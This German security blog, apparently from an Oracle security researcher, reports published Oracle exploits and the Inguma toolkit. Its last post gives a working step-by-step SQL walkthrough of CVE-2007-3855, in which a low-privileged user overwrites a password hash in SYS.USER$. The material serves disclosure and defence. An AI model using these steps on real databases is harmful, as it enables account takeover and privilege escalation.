31 Jan 2008 von Alexander Kornbrust.

Die ersten Exploits, die mit dem Januar 2008 CPU korrigierte Lücken betreffen, sind auf milworm.com veröffentlicht worden.

Alexandr Polyakov von Digital Security veröffentlichte 3 Exploits für die XMLDB. Alexandr hat die Fehler Mitte Dezember 2007 gefunden und an Oracle gemeldet. Da Oracle diese Fehler niemals innerhalb von weniger als einem Monat korrigiert, scheint jemand anderes diese Fehler vorher gefunden haben.

• SQL Injection in PITRIG_DROP (1)
  
• SQL Injection in PITRIG_DROP (2)
  
• SQL Injection in PITRIG_TRUNCATE

Geschrieben in CPUJan2008, Exploit | Drucken | Keine Kommentare »

3 Nov 2007 von Alexander Kornbrust.

Gestern hat ein anonymer Poster (oraclefun@hushmail.com) einen Exploit für XDB_PITRIG_PKG.PITRIG_DROPMETADATA in Oracle 10.2.0.1/10.2.0.2 auf der Sicherheits Mailingliste Buqtraq veröffentlicht, ohne jedoch Erklärungen über betroffene Versionen zu veröffentlichen. Nach einigen Tests gegen verschiedene Datenbank-Versionen habe ich herausgefunden, dass nicht gepatchte Oracle 10.2.0.1 und 10.2.0.2 Datenbanken sofort abstürzen.

Um diesen Exploit laufen zu lassen sind lediglich “Create Session”-Privilegien notwendig. 10.2.0.3 ist nicht davon betroffen.

Erwähnenswert ist weiterhin, dass dieser Exploit IDS Evasion Techniken verwendet und damit viele der üblichen netzwerkbasierten IDS Systeme austrickst.

Oracle 9i Rel. 1, 9i Rel. 2, 10g Rel.1 und 11g sind ebenfalls nicht betroffen und werfen Fehlermeldungen.
######### 9.2.0.8 , 10.1.0.5 #########
ERROR at line 22:
ORA-06550: line 22, column 1:
PLS-00201: identifier ‘XDB.XDB_PITRIG_PKG’ must be declared
ORA-06550: line 22, column 1:
PL/SQL: Statement ignored
#########

######### 10.2.0.3 or 11g #########
ERROR at line 1:
ORA-29329: Table not of type XMLType
ORA-06512: at “XDB.XDB_PITRIG_PKG”, line 127
ORA-06512: at line 22
#########

Geschrieben in Exploit, Oracle Security, Allgemein | Drucken | Keine Kommentare »

20 Okt 2007 von Alexander Kornbrust.

Ich bin gerade zurück von der kleinen, aber feinen Security Konferenz 0sec in Bern, auf der ich zu dem Thema “Latest Trends in Oracle Security” gesprochen habe.

Joxean Koret hat die Version 0.05 seines freien Penetration Toolkit  “Inguma” veröffentlicht. Der Name Inguma kommt von dem baskischen Gott der Träume. Wer da wohl schon träumen soll… DBA’s sicherlich nicht…

Inguma, geschrieben in Phython, unterstützt verschiedene Systeme (z.B.. Oracle, SQL Server, SSH, Firewalls, …). Die folgenden Features von Inguma sind Oracle spezifisch:

* Exploit für die Lücke in SYS.LT.FINDRICSET (Oracle CPU Okt. 2007).
* Modul “bruteora” hinzugefügt, um Oracle Server zu bruteforcen.
* Tool, um MD5 Hashes via Rainbow-Tables zu knacken.
* Modul “sidguess”, um die SID einer Oracle Datenbank zu erraten.
* Password Cracker für Oracle11g.
* Erweiterung des bisherigen Oracle PL/SQL Fuzzer.

Hier ist ein Screenshot von Inguma unter Backtrack 2.

Gut gemacht Joxean.

Geschrieben in Inguma, CPUOct2007, Exploit | Drucken | Keine Kommentare »

22 Jul 2007 von Alexander Kornbrust.

Andrea Purificato hat auf seiner Webseite einen Exploit für das Create-View-Problem (DB17 bzw CVE-2007-3855, das von RDS an Oracle gemeldet), das mit dem Juli 2007 CPU korrigiert wurde.

In dem veröffentlichten Exploit wird über eine View das Passwort in der Tabelle SYS.USER$ mit Hilfe des Update Kommandos aktualisiert. Ganz so wie auf der Webseite beschrieben, funktioniert dieser Exploit aber dennoch nicht, da man Passworte nicht direkt (und von Oracle supported) via Update ändern kann.

Beispiel:
– Zuerst berechnen wir Offline den Passwort Hash für den Benutzer RDS und die Passworte RDS und HACKED
c:\tools>makepwd.exe RDS RDS
B2ABF50FCECAE7CB

c:\tools>makepwd.exe RDS HACKED
7B843A192FF96BE9

– Im nächsten Schritt verbinden wir uns zur Datenbank und aktualisieren den Passwort-Hash über das Update Kommando
SQL> connect cpu/cpu
Connected.
SQL> create or replace view bunkerview as
2    select x.name,x.password from sys.user$ x left outer join sys.user$ y on
x.name=y.name;

View created.
SQL> update cpu.bunkerview set password=’7B843A192FF96BE9′ where name =’RDS’;

1 row updated.

SQL> commit;

Commit complete.

– Das Passwort ist nun auf HACKED geändert worden.

SQL> select password from sys.user$ where name=’RDS’;

PASSWORD
——————————
7B843A192FF96BE9
– Aber dennoch klappt der Connect nicht…
SQL> connect rds/hacked
ERROR:
ORA-01017: invalid username/password; logon denied

Warning: You are no longer connected to ORACLE.

– Damit dieser Exploit zusammen mit der Passwort-Änderung funktioniert, muss man allerdings  die Datenbank neu starten. Nach dem Neustart funktioniert dann der per Update gesetzte Passwort Hash.

C:\>sqlplus rds/hacked

SQL*Plus: Release 10.2.0.3.0 - Production on Sun Jul 22 18:24:41 2007

Copyright (c) 1982, 2006, Oracle.  All Rights Reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 - Production
With the Partitioning, OLAP and Data Mining Scoring Engine options

SQL>

Geschrieben in Exploit, CPUJul2007, Allgemein | Drucken | 1 Kommentar »